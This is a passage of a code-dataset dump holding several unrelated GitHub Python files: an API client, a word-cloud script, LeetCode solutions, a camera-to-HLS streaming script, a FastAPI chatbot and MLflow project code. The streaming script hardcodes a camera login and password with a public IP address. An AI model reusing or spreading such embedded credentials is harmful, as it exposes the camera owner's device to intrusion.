api_information(self, request):\n return request('get', [], schema=API_INFORMATION_SCHEMA)\n\n @auth_required\n @_request(cache=False)\n def token_information(self, request):\n return request('get', ['tokens', 'current'], schema=API_TOKEN_SCHEMA)\n\n @_request(cache=True, use_storage=True)\n def versions(self, request, component_name, spec='*'):\n \"\"\"List of versions for given component with required spec\"\"\"\n\n component_name = component_name.lower()\n semantic_spec = SimpleSpec(spec or '*')\n body = _component_request(request, component_name)\n\n versions = []\n for version in body['versions']:\n if not semantic_spec.match(Version(version['version'])):\n continue\n\n all_build_keys_known = True\n if version.get('build_metadata_keys', None) is not None:\n for build_key in version.get('build_metadata_keys'):\n if build_key not in BUILD_METADATA_KEYS:\n all_build_keys_known = False\n break\n\n if all_build_keys_known:\n versions.append((version, all_build_keys_known))\n\n return tools.manifest.ComponentWithVersions(\n name=component_name,\n versions=[\n tools.manifest.HashedComponentVersion(\n version_string=version['version'],\n component_hash=version['component_hash'],\n dependencies=self._version_dependencies(version),\n targets=version['targets'],\n all_build_keys_known=all_build_keys_known,\n )\n for version, all_build_keys_known in versions\n ],\n )\n\n @_request(cache=True, use_storage=True)\n def component(self, request, component_name, version=None):\n \"\"\"\n Manifest for given version of component, if version is None highest version is returned\n \"\"\"\n\n component_name = component_name.lower()\n response = _component_request(request, component_name)\n versions = response['versions']\n filtered_versions = filter_versions(versions, version, component_name)\n\n if not filtered_versions:\n raise VersionNotFound(\n 'Version of the component \"{}\" satisfying the spec \"{}\" was not found.'.format(\n component_name, str(version)\n )\n )\n\n best_version = max(filtered_versions, key=lambda v: Version(v['version']))\n download_url = join_url(self.storage_url, best_version['url'])\n\n documents = best_version['docs']\n for document, url in documents.items():\n documents[document] = join_url(self.storage_url, url)\n\n license_info = best_version['license']\n if license_info:\n license_info['url'] = join_url(self.storage_url, license_info['url'])\n\n examples = best_version['examples']\n for example in examples:\n example.update({'url': join_url(self.storage_url, example['url'])})\n\n return ComponentDetails(\n name=('%s/%s' % (response['namespace'], response['name'])),\n version=tools.manifest.ComponentVersion(best_version['version']),\n dependencies=self._version_dependencies(best_version),\n maintainers=None,\n download_url=download_url,\n documents=documents,\n license=license_info,\n examples=examples,\n )\n\n def _upload_version_to_endpoint(self, request, file_path, endpoint):\n with open(file_path, 'rb') as file:\n filename = os.path.basename(file_path)\n\n encoder = MultipartEncoder({'file': (filename, file, 'application/octet-stream')})\n headers = {'Content-Type': encoder.content_type}\n\n progress_bar = tqdm(total=encoder.len, unit_scale=True, unit='B', disable=None)\n\n def callback(\n monitor, memo={'progress': 0}\n ): # type: (MultipartEncoderMonitor, dict) -> None\n progress_bar.update(monitor.bytes_read - memo['progress'])\n memo['progress'] = monitor.bytes_read\n\n data = MultipartEncoderMonitor(encoder, callback)\n\n try:\n return request(\n 'post',\n endpoint,\n data=data,\n headers=headers,\n schema=VERSION_UPLOAD_SCHEMA,\n )['job_id']\n finally:\n progress_bar.close()\n\n @auth_required\n @_request(cache=False)\n def upload_version(self, request, component_name, file_path):\n return self._upload_version_to_endpoint(\n request, file_path, ['components', component_name.lower(), 'versions']\n )\n\n @_request(cache=False)\n def validate_version(self, request, file_path):\n return self._upload_version_to_endpoint(request, file_path, ['components', 'validate'])\n\n @auth_required\n @_request(cache=False)\n def delete_version(self, request, component_name, component_version):\n request('delete', ['components', component_name.lower(), component_version])\n\n @auth_required\n @_request(cache=False)\n def yank_version(self, request, component_name, component_version, yank_message):\n request(\n 'post',\n ['components', component_name.lower(), component_version, 'yank'],\n json={'message': yank_message},\n )\n\n @_request(cache=False)\n def task_status(self, request, job_id): # type: (Callable, str) -> TaskStatus\n body = request('get', ['tasks', job_id], schema=TASK_STATUS_SCHEMA)\n return TaskStatus(\n body['message'], body['status'], body['progress'], body.get('warnings', [])\n )\n","repo_name":"espressif/idf-component-manager","sub_path":"idf_component_tools/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"79"} +{"seq_id":"20296232298","text":"#!/usr/bin/env python\n\"\"\"\n\nCode care of https://github.com/amueller wordcloud conda package.\nto install : pip install wordcloud or conda install -c https://conda.anaconda.org/amueller wordcloud\n\nREQUIREMENTS: PIL\n\n\"\"\"\nimport sys, os\nimport welcome_flask3 as flaskapp\n\n#import libraries for generating the wordcloud\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS#, ImageColorGenerator\nimport random\n\n\ndef prep_KWcloud():\n '''\n : param NONE\n : output : Returns a single string of keywords found in the given database.\n '''\n m, data_frame = flaskapp.getPapersKWgroup('paperID')\n entries = \"\"\n for each in data_frame.groups:\n \n entry = \" \".join([key.replace (\" \", \"_\") for key in data_frame.get_group(each)['keyword']])\n \n entries = \" \".join((entries, entry))\n return entries\n\ndef prep_Aucloud():\n \n data_frame = flaskapp.getAuthorsTotal()\n entries = ''\n for each in data_frame.authorName:\n entries = \" \".join((entries, each.strip().replace(', ', '_').replace(' ', '_')))\n \n return entries\n\ndef cloud(cloudtext, outputfile = 'Images/cloud.png'):\n '''\n : param NONE\n : output : Returns a saved .png file of the generated wordcloud. Creating/saving\n a new image eachtime.\n \n '''\n runcloud = {'kw' : prep_KWcloud(),\n 'au' : prep_Aucloud()\n }\n #IF WANT TO ADD CERTAIN WORDS TO BE EXCLUDED>>>\n #stopwords = set(STOPWORDS)\n #stopwords.add(\"said\")\n \n #generate a single string of ALL the keywords!\n text = runcloud[cloudtext]\n\n #wc.generate(text)\n #Image from : https://lifebeinghusky.files.wordpress.com/2010/02/paw.jpg\n NortheasternHusky = np.array(Image.open(\"static/Images/paw.jpg\"))\n \n # take relative word frequencies into account, lower max_font_size\n wc = WordCloud(background_color=\"white\", \n max_font_size=40, \n relative_scaling=.5, \n mask=NortheasternHusky).generate(text)\n\n plt.figure()\n #plt.imshow(wc)\n plt.axis(\"off\")\n #plt.show()\n # store Image?\n wc.to_file(outputfile)\n \n return wc\n\n","repo_name":"noveroa/DataBases","sub_path":"Flask/app/drafts/wcg/wordcloud_generator.py","file_name":"wordcloud_generator.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3438502727","text":"class Solution:\n def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\n \n graph = [[] for _ in range(n)]\n for i, (a, b) in enumerate(edges):\n prob = succProb[i]\n graph[a].append((b, prob))\n graph[b].append((a, prob))\n \n dist = [0] * n\n dist[start] = 1.0\n \n pq = [(-1.0, start)]\n heapq.heapify(pq)\n \n while pq:\n prob, node = heapq.heappop(pq)\n prob *= -1.0\n \n if node == end:\n return prob\n \n if prob < dist[node]:\n continue\n \n for neighbor, edge_prob in graph[node]:\n new_prob = prob * edge_prob\n if new_prob > dist[neighbor]:\n dist[neighbor] = new_prob\n heapq.heappush(pq, (-new_prob, neighbor))\n \n return 0.0\n","repo_name":"ranilmukesh/daily-leetcode-hard-solutions-using-python","sub_path":"1514. Path with Maximum Probability.py","file_name":"1514. Path with Maximum Probability.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24429497998","text":"import subprocess\nimport cv2\nimport threading\nimport numpy as np\nimport imutils\nimport multiprocessing\nimport os, shutil\n\n\nfps = 30\nwidth = 400\nheight = 800\n\ncommand1 = ['ffmpeg',\n '-y',\n '-re',\n '-f', 'rawvideo',\n '-vcodec', 'rawvideo',\n '-pix_fmt', 'bgr24',\n '-s', \"{}x{}\".format(width, height),\n '-r', str(fps),\n '-i', '-',\n '-pix_fmt', 'yuv420p',\n # '-r', '30',\n '-g', '50',\n '-crf', '21',\n '-c:v', 'libx264', \n '-b:v', '2M',\n '-bufsize', '64M',\n '-maxrate', \"4M\",\n '-preset', 'veryfast',\n # '-rtsp_transport', 'tcp',\n # '-segment_times', '5',\n # '-f', 'rtsp',\n # 'rtsp://65.1.134.231:8554/mystream',\n '-sc_threshold', '0',\n '-start_number','0',\n '-hls_time','6',\n '-hls_list_size','0',\n # '-hls_flags', 'delete_segments',\n # '-hls_flags' ,'+append_list',\n # '-hls_flags' ,'+discont_start',\n '-hls_flags', '+program_date_time',\n '-hls_playlist_type', 'event',\n # '-hls_flags', 'single_file',\n # '-f','hls',\n # '-segment_list_flags', '+live',\n # '-segment_wrap', '6',\n # 'media/cam1/hsl.m3u8'\n r'C:\\Users\\Kaamil\\Documents\\enturf-compression\\media\\cam1\\hsl.m3u8'\n ]\n\n# command2 = ['ffmpeg',\n# '-y',\n# '-re',\n# '-f', 'rawvideo',\n# '-vcodec', 'rawvideo',\n# '-pix_fmt', 'bgr24',\n# '-s', \"{}x{}\".format(width, height),\n# '-r', str(fps),\n# '-i', '-',\n# '-pix_fmt', 'yuv420p',\n# '-r', '30',\n# '-g', '50',\n# '-c:v', 'libx264',\n# '-b:v', '2M',\n# '-bufsize', '64M',\n# '-maxrate', \"4M\",\n# '-preset', 'veryfast',\n# '-rtsp_transport', 'tcp',\n# '-segment_times', '5',\n# '-f', 'rtsp',\n# 'rtsp://localhost:8554/mystream2',\n# # '-start_number','0',\n# # '-hls_time','1',\n# # '-hls_list_size','0',\n# # '-f','hls',\n# # r'C:\\Users\\Kaamil\\Documents\\enturf-compression\\media\\cam2\\hsl'\n# ]\n\np = subprocess.Popen(command1, stdin=subprocess.PIPE)\n# p2 = subprocess.Popen(command2, stdin=subprocess.PIPE)\n\n\n\nclass PlayCamera(object):\n def __init__(self,value):\n self.video = value\n (self.grabbed, self.frame) = self.video.read()\n threading.Thread(target=self.update, args=()).start()\n def __del__(self):\n self.video.release()\n def get_frame(self):\n image = self.frame\n return image\n def update(self):\n while True:\n (self.grabbed, self.frame) = self.video.read() \n\ndef gen(camera,p):\n greenLower = (29, 86, 6)\n greenUpper = (64, 255, 255)\n # greenLower = (0, 166, 0)\n # greenUpper = (25, 255, 255)\n while True:\n frame = camera.get_frame()\n\n frame = imutils.resize(frame, width=600)\n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv, greenLower, greenUpper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n center = None\n\n if len(cnts) > 0:\n\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n if radius > 5:\n\n cv2.circle(frame, (int(x), int(y)), int(radius),\n (0, 255, 255), 2)\n cv2.circle(frame, center, 5, (0, 0, 255), -1)\n\n if center:\n start_val=center[0]-100\n End_val=center[0]+100\n if start_val<0:\n End_val=End_val-start_val\n start_val=0\n if End_val>600:\n start_val=start_val-End_val\n End_val=600\n cropped_image=frame[0:,start_val:End_val]\n else:\n cropped_image=frame[0:,200:400]\n \n resize=cv2.resize(cropped_image,(400,800))\n\n\n p.stdin.write(resize.tobytes())\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n \ndef cam1_start():\n folder = 'media/cam1/'\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n value=cv2.VideoCapture('rtsp://admin:user@123@49.207.177.194:10554/Streaming/Channels/101')\n # value=cv2.VideoCapture('rtsp://49.207.177.194:8011/h264_ulaw.sdp')\n cam = PlayCamera(value)\n gen(cam,p)\n\n\n# def cam2_start():\n# value=cv2.VideoCapture('rtsp://admin:user@123@169.254.17.246:554/Streaming/Channels/101')\n# cam = PlayCamera(value)\n# gen(cam,p2)\n\n# cam1_start()\n# cam2_start()\n\n# if __name__ == '__main__':\n\n# threading(target = cam1_start).start()\n# threading(target = cam2_start).start()\n# while True:\n# time.sleep(5)\n\n\nif __name__ == \"__main__\":\n # creating processes\n p1 = multiprocessing.Process(target=cam1_start, args=())\n # p2 = multiprocessing.Process(target=cam2_start, args=( ))\n\n p1.start()\n # p2.start()\n ","repo_name":"Madurai-coders/enturf-compression","sub_path":"test_B_trail_1.py","file_name":"test_B_trail_1.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7994130621","text":"# https://leetcode.com/problems/minimum-cost-to-make-at-least-one-valid-path-in-a-grid/\n\nfrom typing import *\n\nINF = 10 ** 10\n\nmx = [1, -1, 0, 0]\nmy = [0, 0, 1, -1]\n\nclass Solution:\n def minCost(self, grid: List[List[int]]) -> int:\n self.n = len(grid)\n self.m = len(grid[0])\n\n self.dis = [[INF for j in range(self.m)] for i in range(self.n)]\n\n self.dis[0][0] = 0\n self.q = [(0, 0)]\n self.visit = set([(0, 0)])\n\n while self.q:\n cur = self.q.pop(0)\n self.visit.remove(cur)\n\n y, x = cur\n for i in range(4):\n ny = y + my[i]\n nx = x + mx[i]\n nc = self.dis[y][x] + (0 if i == grid[y][x] - 1 else 1)\n\n if 0 <= ny < self.n and 0 <= nx < self.m:\n if nc < self.dis[ny][nx]:\n self.dis[ny][nx] = nc\n if (ny, nx) not in self.visit:\n self.visit.add((ny, nx))\n self.q.append((ny, nx))\n res = self.dis[self.n - 1][self.m - 1]\n return res\n\nS = Solution()\n\nassert(S.minCost([[1,1,3],[3,2,2],[1,1,4]]) == 0)\nassert(S.minCost([[1,1,1,1],[2,2,2,2],[1,1,1,1],[2,2,2,2]]) == 3)\nassert(S.minCost([[1,2],[4,3]]) == 1)\nassert(S.minCost([[4]]) == 0)\n","repo_name":"Wizmann/ACM-ICPC","sub_path":"Leetcode/Algorithm/python/2000/01368-Minimum Cost to Make at Least One Valid Path in a Grid.py","file_name":"01368-Minimum Cost to Make at Least One Valid Path in a Grid.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"79"} +{"seq_id":"10643137712","text":"import numpy as np\r\nclass Multivariate_Optimization:\r\n def __init__(self,start,direction,range):\r\n self.start=np.array(start)\r\n self.direction=np.array(direction)\r\n self.range=range\r\n \r\n def bracketing(self,N,fn):\r\n for i in range(N-2):\r\n #print(\"ROUND\",i)\r\n if fn(self.w_all[i]) >= fn(self.w_all[i+1]) <= fn(self.w_all[i+2]):\r\n #print(\"ROUND\",i)\r\n return np.array([self.w_all[i],self.w_all[i+2]]),i\r\n \r\n if fn(self.w_all[0]) > fn(self.w_all[-1]):\r\n print(f\"Highest Value at {self.w_all[0]}\")\r\n return self.w_all[0]\r\n else:\r\n print(f\"Highest Value at {self.w_all[-1]}\")\r\n return self.w_all[-1]\r\n\r\n def region_elimination(self, range, e, fn):\r\n a= range[0]\r\n b= range[1]\r\n #print(a,b)\r\n #print((a-b)/4)\r\n L = (b-a)/4\r\n #print(f\"L:{L}\")\r\n\r\n if abs(np.average(L))= 10:\n break\n return hashtags_list\n\nif __name__ == '__main__':\n L = Instaloader()\n print('Write post link here:')\n SHORTCODE = input()\n POST = Post.from_shortcode(L.context, SHORTCODE)\n print(get_hashtags(POST))\n ","repo_name":"e2tovar/instatools","sub_path":"get_post_hashtags.py","file_name":"get_post_hashtags.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"21659833650","text":"from fastapi import FastAPI, HTTPException, Request\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter, RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.chains import RetrievalQAWithSourcesChain\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.vectorstores import Chroma\nimport sqlite3\n\n\n#Import GIKIAN...\nimport os\nos.environ[\"OPENAI_API_KEY\"] = \"OPENAI_API_KEY\"\n\n#Scraped data\nwith open('./cleanScrape.txt') as f:\n documents = f.read()\n\ntext_splitter = RecursiveCharacterTextSplitter(\n chunk_size = 1000,\n chunk_overlap = 0,\n length_function = len, )\n\ntexts = text_splitter.create_documents([documents])\n\nlen(texts)\n\n# Embeddings\nembeddings = OpenAIEmbeddings()\ndb = FAISS.from_documents(texts, embeddings)\n\n#Database storing\n\nllm=ChatOpenAI(temperature=0, model_name='gpt-3.5-turbo')\n\nchain = load_qa_chain(llm, chain_type=\"stuff\")\n\ndef get_similar_documents(query):\n docs = db.similarity_search(query)\n return docs\n\ndef get_chatbot_response(question, docs):\n response = chain.run(input_documents=docs, question=question)\n return response\n\ndef insert_into_database(query, response):\n cursor.execute('INSERT INTO chatbot_history (query, chatbot_response) VALUES (?, ?)', (query, response))\n conn.commit()\n\n\n# Connect to the SQLite database on Google Drive\ndatabase_path = \"database.db\"\nconn = sqlite3.connect(database_path)\ncursor = conn.cursor()\n\napp = FastAPI()\n\nfrom fastapi.middleware.cors import CORSMiddleware\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Mount the static files directory\napp.mount(\"/templates\", StaticFiles(directory=\"templates\"), name=\"templates\")\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_index(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\nprint(\"Debugging\")\n\nfrom typing import List\nfrom pydantic import BaseModel\n\nclass ChatMessage(BaseModel):\n role: str\n content: str\n\n@app.post(\"/api/chatbot\")\nasync def chat_with_bot(message: ChatMessage):\n query = message.content\n relevant_docs = get_similar_documents(query)\n chatbot_response = get_chatbot_response(query, relevant_docs)\n insert_into_database(query, chatbot_response)\n\n return {\"response\": chatbot_response}\n\n","repo_name":"RaoEhsanElahi/Musk-AI-Internship","sub_path":"GIKIAN_ChatBot/Backend_API/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26759879966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 14 17:40:13 2017\n\n@author: Juan Antonio Barragán Noguera\n@email: jabarragann@unal.edu.co\n\n\"\"\"\n\nfrom itertools import product\n\nfile=open(\"04_MaximazeIt3.txt\",\"r\")\n\nargArray= file.readline().split(\" \")\n\nnumberOfLines=int(argArray[0])\nmodNumber=int(argArray[1])\n\narrays=[]\nfor i in range(numberOfLines):\n argArray=file.readline().split(\" \")\n temp=[]\n for i in argArray:\n temp.append(int(i)) \n \n arrays.append(temp)\n\n\nproduct1=list(product(*arrays))\n\nmaxNumb=0\nfor arg in product1:\n sum1=0\n for item in arg:\n sum1=sum1+item**2\n result=sum1%modNumber\n if result > maxNumb:\n maxNumb=result\n \nprint(\"Answer is: \"+ str(maxNumb))\n\nfile.close()\n","repo_name":"jabarragann/HackerRankChallenges","sub_path":"Python/Itertools/04_MaximazeIt.py","file_name":"04_MaximazeIt.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19126415861","text":"from RulesetComparer.date_model.json_parser.permission import PermissionParser\nfrom RulesetComparer.models import ReportSchedulerInfo\nfrom permission.utils.permission_manager import *\nfrom common.data_object.error.error import PermissionDeniedError\n\n\nclass UpdateReportSchedulerStatusParser(PermissionParser):\n def __init__(self, json_data, user):\n try:\n self.user = user\n self.task_id = json_data.get(KEY_TASK_ID)\n self.task = ReportSchedulerInfo.objects.get(id=self.task_id)\n\n self.enable = json_data.get(KEY_ENABLE)\n if self.enable:\n self.enable = 1\n else:\n self.enable = 0\n PermissionParser.__init__(self)\n except Exception as e:\n raise e\n\n def check_permission(self):\n function_id = Function.objects.get(name=KEY_F_REPORT_TASK, module__name=KEY_M_RULESET).id\n\n for country_id_obj in self.task.country_list.values(KEY_ID):\n country_id = country_id_obj.get(KEY_ID)\n is_base_editable = is_editable(self.user.id, self.task.base_environment.id, country_id, function_id)\n is_target_editable = is_editable(self.user.id, self.task.compare_environment.id, country_id, function_id)\n\n if is_base_editable is False or is_target_editable is False:\n raise PermissionDeniedError()\n","repo_name":"wendywu-taiwan/conf-mgt-tool-light","sub_path":"RulesetComparer/date_model/json_parser/update_report_scheduler_status.py","file_name":"update_report_scheduler_status.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18773420696","text":"\"\"\"\ndata_ingestion\n\nTakes a path as input along with pipeline name and the interpreter name\nReads the dataset using the said pipeline's specified interpreter\nIf the interpreter raises no errors, the path is copied into datasets\nIf any errrors occur or assertions fail, path is rejected\n\"\"\"\nfrom distutils.dir_util import copy_tree\nimport traceback\nimport os\nimport datetime\n\nfrom constants import DATASET_DIR\nfrom pipeline_input import pipeline_input\n\ndef ingest_data(p_input: pipeline_input, INTERPRETER_NAME: str, input_dir: str, validate_only=False):\n\tassert isinstance(p_input, pipeline_input)\n\tdataset_interp_class = p_input.get_pipeline_dataset_interpreter_by_name(INTERPRETER_NAME)\n\tpipeline_name = p_input.get_pipeline_name()\n\tPIPELINE_BASE_FOLDER = DATASET_DIR.format(pipeline_name=pipeline_name)\n\tos.makedirs(PIPELINE_BASE_FOLDER, exist_ok=True)\n\tBASE_FOLDER_ID = os.path.join(PIPELINE_BASE_FOLDER, INTERPRETER_NAME, str(datetime.datetime.now()).replace(\" \", \"_\"))\n\ttry:\n\t\tdat = dataset_interp_class(input_dir)\n\t\tprint(\"Interpreter accepted\")\n\t\tif not validate_only:\n\t\t\tprint(\"COPYING...\")\n\t\t\tprint(input_dir, '->',BASE_FOLDER_ID)\n\t\t\tos.makedirs(BASE_FOLDER_ID, exist_ok=True)\n\t\t\tcopy_tree(input_dir, BASE_FOLDER_ID)\n\t\telse:\n\t\t\tprint(dat.get_dataset())\n\texcept AssertionError as ex:\n\t\tprint(\"Interpreter rejected, aborting...\")\n\t\tprint(ex)\n\t\ttraceback.print_exc()\n\n\nif __name__==\"__main__\":\n\tfrom all_pipelines import get_all_inputs\n\tall_inputs = get_all_inputs()\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--input_dir', type=str, required=True)\n\tparser.add_argument('--pipeline_name', type=str, required=True)\n\tparser.add_argument('--interpreter_name', type=str, required=True)\n\tparser.add_argument('--validate_only', action='store_true')\n\targs = parser.parse_args()\n\tingest_data(all_inputs[args.pipeline_name], args.interpreter_name, args.input_dir, args.validate_only)\n","repo_name":"Kora-Scenes/ML_Ops_Pipeline","sub_path":"ML_Ops_Pipeline/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20150119732","text":"\"\"\"APIs for running MLflow projects locally or remotely.\"\"\"\n\nfrom __future__ import print_function\n\nfrom distutils import dir_util\nimport hashlib\nimport json\nimport os\nimport re\nimport subprocess\nimport tempfile\n\nfrom mlflow.projects.submitted_run import LocalSubmittedRun\nfrom mlflow.projects import _project_spec\nfrom mlflow.utils.exception import ExecutionException\nfrom mlflow.entities import RunStatus, SourceType, Param\nimport mlflow.tracking as tracking\nfrom mlflow.tracking.fluent import _get_experiment_id, _get_git_commit\n\n\nfrom mlflow.utils import process\nfrom mlflow.utils.logging_utils import eprint\n\n# TODO: this should be restricted to just Git repos and not S3 and stuff like that\n_GIT_URI_REGEX = re.compile(r\"^[^/]*:\")\n# Environment variable indicating a path to a conda installation. MLflow will default to running\n# \"conda\" if unset\nMLFLOW_CONDA_HOME = \"MLFLOW_CONDA_HOME\"\n\n\ndef _run(uri, entry_point=\"main\", version=None, parameters=None, experiment_id=None,\n mode=None, cluster_spec=None, git_username=None, git_password=None, use_conda=True,\n storage_dir=None, block=True, run_id=None):\n \"\"\"\n Helper that delegates to the project-running method corresponding to the passed-in mode.\n Returns a ``SubmittedRun`` corresponding to the project run.\n \"\"\"\n exp_id = experiment_id or _get_experiment_id()\n parameters = parameters or {}\n work_dir = _fetch_project(uri=uri, force_tempdir=False, version=version,\n git_username=git_username, git_password=git_password)\n project = _project_spec.load_project(work_dir)\n project.get_entry_point(entry_point)._validate_parameters(parameters)\n if run_id:\n active_run = tracking.get_service().get_run(run_id)\n else:\n active_run = _create_run(uri, exp_id, work_dir, entry_point, parameters)\n\n if mode == \"databricks\":\n from mlflow.projects.databricks import run_databricks\n return run_databricks(\n remote_run=active_run,\n uri=uri, entry_point=entry_point, work_dir=work_dir, parameters=parameters,\n experiment_id=exp_id, cluster_spec=cluster_spec)\n elif mode == \"local\" or mode is None:\n # Synchronously create a conda environment (even though this may take some time) to avoid\n # failures due to multiple concurrent attempts to create the same conda env.\n conda_env_name = _get_or_create_conda_env(project.conda_env_path) if use_conda else None\n # In blocking mode, run the entry point command in blocking fashion, sending status updates\n # to the tracking server when finished. Note that the run state may not be persisted to the\n # tracking server if interrupted\n if block:\n command = _get_entry_point_command(\n project, entry_point, parameters, conda_env_name, storage_dir)\n return _run_entry_point(command, work_dir, exp_id, run_id=active_run.info.run_uuid)\n # Otherwise, invoke `mlflow run` in a subprocess\n return _invoke_mlflow_run_subprocess(\n work_dir=work_dir, entry_point=entry_point, parameters=parameters, experiment_id=exp_id,\n use_conda=use_conda, storage_dir=storage_dir, run_id=active_run.info.run_uuid)\n supported_modes = [\"local\", \"databricks\"]\n raise ExecutionException(\"Got unsupported execution mode %s. Supported \"\n \"values: %s\" % (mode, supported_modes))\n\n\ndef run(uri, entry_point=\"main\", version=None, parameters=None, experiment_id=None,\n mode=None, cluster_spec=None, git_username=None, git_password=None, use_conda=True,\n storage_dir=None, block=True, run_id=None):\n \"\"\"\n Run an MLflow project from the given URI.\n\n Supports downloading projects from Git URIs with a specified version, or copying them from\n the file system. For Git-based projects, a commit can be specified as the ``version``.\n\n :raises ``ExecutionException``: If a run launched in blocking mode is unsuccessful.\n\n :param uri: URI of project to run. Expected to be either a relative/absolute local filesystem\n path or a git repository URI (e.g. https://github.com/mlflow/mlflow-example)\n pointing to a project directory containing an MLproject file.\n :param entry_point: Entry point to run within the project. If no entry point with the specified\n name is found, attempts to run the project file ``entry_point`` as a script,\n using \"python\" to run .py files and the default shell (specified by\n environment variable $SHELL) to run .sh files.\n :param experiment_id: ID of experiment under which to launch the run.\n :param mode: Execution mode for the run. Can be set to \"local\" or \"databricks\".\n :param cluster_spec: Path to JSON file describing the cluster to use when launching a run on\n Databricks.\n :param git_username: Username for HTTP(S) authentication with Git.\n :param git_password: Password for HTTP(S) authentication with Git.\n :param use_conda: If True (the default), creates a new Conda environment for the run and\n installs project dependencies within that environment. Otherwise, runs the\n project in the current environment without installing any project\n dependencies.\n :param storage_dir: Only used if ``mode`` is local. MLflow will download artifacts from\n distributed URIs passed to parameters of type 'path' to subdirectories of\n ``storage_dir``.\n :param block: Whether or not to block while waiting for a run to complete. Defaults to True.\n Note that if ``block`` is False and mode is \"local\", this method will return, but\n the current process will block when exiting until the local run completes.\n If the current process is interrupted, any asynchronous runs launched via this\n method will be terminated.\n :param run_id: Note: this argument is used internally by the MLflow project APIs and should\n not be specified. If specified, the given run ID will be used instead of\n creating a new run.\n :return: A ``SubmittedRun`` exposing information (e.g. run ID) about the launched run. The\n returned ``SubmittedRun`` is not thread-safe.\n \"\"\"\n submitted_run_obj = _run(\n uri=uri, entry_point=entry_point, version=version, parameters=parameters,\n experiment_id=experiment_id, mode=mode, cluster_spec=cluster_spec,\n git_username=git_username, git_password=git_password, use_conda=use_conda,\n storage_dir=storage_dir, block=block, run_id=run_id)\n if block:\n _wait_for(submitted_run_obj)\n return submitted_run_obj\n\n\ndef _wait_for(submitted_run_obj):\n \"\"\"Wait on the passed-in submitted run, reporting its status to the tracking server.\"\"\"\n run_id = submitted_run_obj.run_id\n active_run = None\n # Note: there's a small chance we fail to report the run's status to the tracking server if\n # we're interrupted before we reach the try block below\n try:\n active_run = tracking.get_service().get_run(run_id) if run_id is not None else None\n if submitted_run_obj.wait():\n eprint(\"=== Run (ID '%s') succeeded ===\" % run_id)\n _maybe_set_run_terminated(active_run, \"FINISHED\")\n else:\n _maybe_set_run_terminated(active_run, \"FAILED\")\n raise ExecutionException(\"=== Run (ID '%s') failed ===\" % run_id)\n except KeyboardInterrupt:\n eprint(\"=== Run (ID '%s') === interrupted, cancelling run ===\" % run_id)\n submitted_run_obj.cancel()\n _maybe_set_run_terminated(active_run, \"FAILED\")\n raise\n\n\ndef _parse_subdirectory(uri):\n # Parses a uri and returns the uri and subdirectory as separate values.\n # Uses '#' as a delimiter.\n subdirectory = ''\n parsed_uri = uri\n if '#' in uri:\n subdirectory = uri[uri.find('#')+1:]\n parsed_uri = uri[:uri.find('#')]\n if subdirectory and '.' in subdirectory:\n raise ExecutionException(\"'.' is not allowed in project subdirectory paths.\")\n return parsed_uri, subdirectory\n\n\ndef _get_storage_dir(storage_dir):\n if storage_dir is not None and not os.path.exists(storage_dir):\n 